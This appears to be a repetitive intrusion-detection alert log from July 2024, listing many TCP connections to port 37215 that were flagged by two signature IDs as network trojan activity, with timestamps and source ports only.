                  Timestamp:07/10/24-08:27:27.164034
                  SID:2829579
                  Source Port:44192
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.856431
                  SID:2835222
                  Source Port:59592
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.115496
                  SID:2829579
                  Source Port:49284
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.119674
                  SID:2829579
                  Source Port:35668
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.171769
                  SID:2835222
                  Source Port:45714
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:16.998730
                  SID:2829579
                  Source Port:36932
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.623254
                  SID:2829579
                  Source Port:55002
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.507602
                  SID:2835222
                  Source Port:39484
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.008253
                  SID:2829579
                  Source Port:35498
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.296464
                  SID:2835222
                  Source Port:50250
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.925849
                  SID:2835222
                  Source Port:40470
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.139593
                  SID:2829579
                  Source Port:40650
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.930940
                  SID:2829579
                  Source Port:60994
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.209282
                  SID:2829579
                  Source Port:36542
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.505236
                  SID:2829579
                  Source Port:44960
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.513310
                  SID:2829579
                  Source Port:55750
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.814153
                  SID:2835222
                  Source Port:53556
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.951146
                  SID:2829579
                  Source Port:39034
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.603573
                  SID:2829579
                  Source Port:42228
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.890637
                  SID:2829579
                  Source Port:52518
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.199033
                  SID:2835222
                  Source Port:38964
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.821623
                  SID:2829579
                  Source Port:44580
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.997758
                  SID:2829579
                  Source Port:44374
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.663156
                  SID:2829579
                  Source Port:37146
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.600239
                  SID:2835222
                  Source Port:34554
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.200630
                  SID:2835222
                  Source Port:60066
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.464906
                  SID:2835222
                  Source Port:56996
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.683410
                  SID:2829579
                  Source Port:56358
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.908603
                  SID:2835222
                  Source Port:40872
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.091002
                  SID:2829579
                  Source Port:34550
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.922247
                  SID:2829579
                  Source Port:34578
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.428657
                  SID:2835222
                  Source Port:53818
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.476455
                  SID:2829579
                  Source Port:54066
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.392573
                  SID:2829579
                  Source Port:37614
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.411856
                  SID:2835222
                  Source Port:54818
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.070313
                  SID:2829579
                  Source Port:42906
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.887848
                  SID:2835222
                  Source Port:50482
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.848554
                  SID:2835222
                  Source Port:57088
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.772556
                  SID:2829579
                  Source Port:57026
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.189042
                  SID:2829579
                  Source Port:53968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.924577
                  SID:2829579
                  Source Port:44566
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.794949
                  SID:2835222
                  Source Port:55524
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.829740
                  SID:2829579
                  Source Port:54330
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.845496
                  SID:2829579
                  Source Port:48770
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.633588
                  SID:2835222
                  Source Port:56728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.813779
                  SID:2835222
                  Source Port:54340
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.496994
                  SID:2835222
                  Source Port:41618
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.877940
                  SID:2829579
                  Source Port:40920
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.606854
                  SID:2829579
                  Source Port:42662
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.709645
                  SID:2829579
                  Source Port:56140
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.033670
                  SID:2829579
                  Source Port:41192
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.865384
                  SID:2835222
                  Source Port:41062
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.397659
                  SID:2829579
                  Source Port:59132
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.983853
                  SID:2829579
                  Source Port:43380
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.178125
                  SID:2835222
                  Source Port:46894
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.151315
                  SID:2835222
                  Source Port:37272
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.255856
                  SID:2829579
                  Source Port:53930
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.068814
                  SID:2829579
                  Source Port:39464
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.893458
                  SID:2835222
                  Source Port:48684
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.465433
                  SID:2829579
                  Source Port:39136
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.822867
                  SID:2829579
                  Source Port:56462
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.980831
                  SID:2835222
                  Source Port:49530
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.520023
                  SID:2829579
                  Source Port:40544
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.784576
                  SID:2835222
                  Source Port:34024
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.216142
                  SID:2829579
                  Source Port:39048
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.714102
                  SID:2829579
                  Source Port:59576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.119674
                  SID:2829579
                  Source Port:42588
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.540383
                  SID:2835222
                  Source Port:39186
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.001524
                  SID:2829579
                  Source Port:50292
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.418339
                  SID:2829579
                  Source Port:39320
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.721350
                  SID:2835222
                  Source Port:58754
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.011385
                  SID:2835222
                  Source Port:39944
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.420210
                  SID:2829579
                  Source Port:59168
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.925907
                  SID:2829579
                  Source Port:46614
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.406930
                  SID:2829579
                  Source Port:56240
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.878157
                  SID:2829579
                  Source Port:55530
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.996170
                  SID:2835222
                  Source Port:38014
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.325434
                  SID:2835222
                  Source Port:39938
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.394014
                  SID:2835222
                  Source Port:53422
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.837922
                  SID:2829579
                  Source Port:48710
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.748001
                  SID:2835222
                  Source Port:41074
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.508243
                  SID:2829579
                  Source Port:52686
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.684788
                  SID:2829579
                  Source Port:47702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.479791
                  SID:2835222
                  Source Port:51866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.108378
                  SID:2829579
                  Source Port:60738
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.158777
                  SID:2835222
                  Source Port:50030
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.632030
                  SID:2835222
                  Source Port:37216
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.486586
                  SID:2829579
                  Source Port:40524
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.908603
                  SID:2835222
                  Source Port:48832
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.355050
                  SID:2829579
                  Source Port:48764
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.561451
                  SID:2829579
                  Source Port:33992
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.427067
                  SID:2829579
                  Source Port:59818
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.020494
                  SID:2835222
                  Source Port:60930
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.810296
                  SID:2829579
                  Source Port:51078
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.610016
                  SID:2829579
                  Source Port:42304
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.647233
                  SID:2829579
                  Source Port:35290
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.758809
                  SID:2835222
                  Source Port:47700
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.361334
                  SID:2835222
                  Source Port:52702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.545063
                  SID:2829579
                  Source Port:34218
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.914980
                  SID:2829579
                  Source Port:57890
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.430749
                  SID:2835222
                  Source Port:38012
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.243243
                  SID:2835222
                  Source Port:40416
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.828075
                  SID:2829579
                  Source Port:34860
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.839334
                  SID:2829579
                  Source Port:59644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.516345
                  SID:2835222
                  Source Port:53000
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.254511
                  SID:2835222
                  Source Port:42832
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.157992
                  SID:2835222
                  Source Port:55186
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.837578
                  SID:2829579
                  Source Port:54752
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.752135
                  SID:2829579
                  Source Port:49856
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.000608
                  SID:2835222
                  Source Port:58562
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.615223
                  SID:2829579
                  Source Port:54954
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.134098
                  SID:2829579
                  Source Port:38318
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.830759
                  SID:2835222
                  Source Port:38484
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.829838
                  SID:2835222
                  Source Port:58660
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.763475
                  SID:2829579
                  Source Port:37010
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.153663
                  SID:2829579
                  Source Port:47594
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.616249
                  SID:2835222
                  Source Port:45544
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.468391
                  SID:2829579
                  Source Port:55318
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.621724
                  SID:2835222
                  Source Port:57918
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.495859
                  SID:2835222
                  Source Port:37212
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.132803
                  SID:2835222
                  Source Port:51522
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.610519
                  SID:2829579
                  Source Port:55676
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.821130
                  SID:2829579
                  Source Port:43998
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.170631
                  SID:2829579
                  Source Port:43880
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.926314
                  SID:2835222
                  Source Port:41610
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.766150
                  SID:2829579
                  Source Port:46058
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.822867
                  SID:2829579
                  Source Port:59942
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.015024
                  SID:2829579
                  Source Port:53818
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.724469
                  SID:2835222
                  Source Port:45806
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.752380
                  SID:2835222
                  Source Port:37556
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.732568
                  SID:2835222
                  Source Port:56442
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.974935
                  SID:2829579
                  Source Port:36318
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.633014
                  SID:2835222
                  Source Port:49316
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.553494
                  SID:2829579
                  Source Port:34046
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.827269
                  SID:2835222
                  Source Port:56488
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.514451
                  SID:2835222
                  Source Port:46368
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.027342
                  SID:2835222
                  Source Port:49252
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.826034
                  SID:2829579
                  Source Port:34438
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.161010
                  SID:2829579
                  Source Port:46178
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.273552
                  SID:2835222
                  Source Port:38764
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.973446
                  SID:2829579
                  Source Port:51552
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.962795
                  SID:2829579
                  Source Port:34340
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.223099
                  SID:2835222
                  Source Port:46156
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.995767
                  SID:2835222
                  Source Port:36262
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.308313
                  SID:2829579
                  Source Port:37982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.514524
                  SID:2835222
                  Source Port:49206
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.444805
                  SID:2835222
                  Source Port:36420
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.828075
                  SID:2829579
                  Source Port:36794
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.428275
                  SID:2835222
                  Source Port:42082
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.537865
                  SID:2829579
                  Source Port:41430
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.015833
                  SID:2829579
                  Source Port:50064
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.437126
                  SID:2829579
                  Source Port:57786
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.439677
                  SID:2829579
                  Source Port:56194
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.141072
                  SID:2835222
                  Source Port:46806
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.759189
                  SID:2829579
                  Source Port:45624
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.767213
                  SID:2829579
                  Source Port:35742
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.046263
                  SID:2829579
                  Source Port:47730
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.151855
                  SID:2829579
                  Source Port:44346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.512534
                  SID:2829579
                  Source Port:37750
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.644371
                  SID:2829579
                  Source Port:55960
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.564607
                  SID:2829579
                  Source Port:59212
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.151855
                  SID:2835222
                  Source Port:38314
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.948537
                  SID:2829579
                  Source Port:47028
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.920818
                  SID:2829579
                  Source Port:58208
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.360287
                  SID:2829579
                  Source Port:47300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.858032
                  SID:2835222
                  Source Port:56984
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.072343
                  SID:2829579
                  Source Port:39488
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.144985
                  SID:2835222
                  Source Port:53898
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.542221
                  SID:2835222
                  Source Port:47892
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.196702
                  SID:2829579
                  Source Port:49264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.941043
                  SID:2829579
                  Source Port:42940
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.230856
                  SID:2829579
                  Source Port:55194
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.320404
                  SID:2835222
                  Source Port:47066
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.911510
                  SID:2835222
                  Source Port:47088
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.011735
                  SID:2835222
                  Source Port:45176
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.911510
                  SID:2835222
                  Source Port:33566
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.761969
                  SID:2835222
                  Source Port:46940
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.644926
                  SID:2835222
                  Source Port:60434
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.008729
                  SID:2835222
                  Source Port:43210
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.772266
                  SID:2829579
                  Source Port:38784
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.489238
                  SID:2835222
                  Source Port:53494
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.400410
                  SID:2835222
                  Source Port:37984
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.439676
                  SID:2835222
                  Source Port:44320
                  Destination Port:37215
                  Protocol:TCP
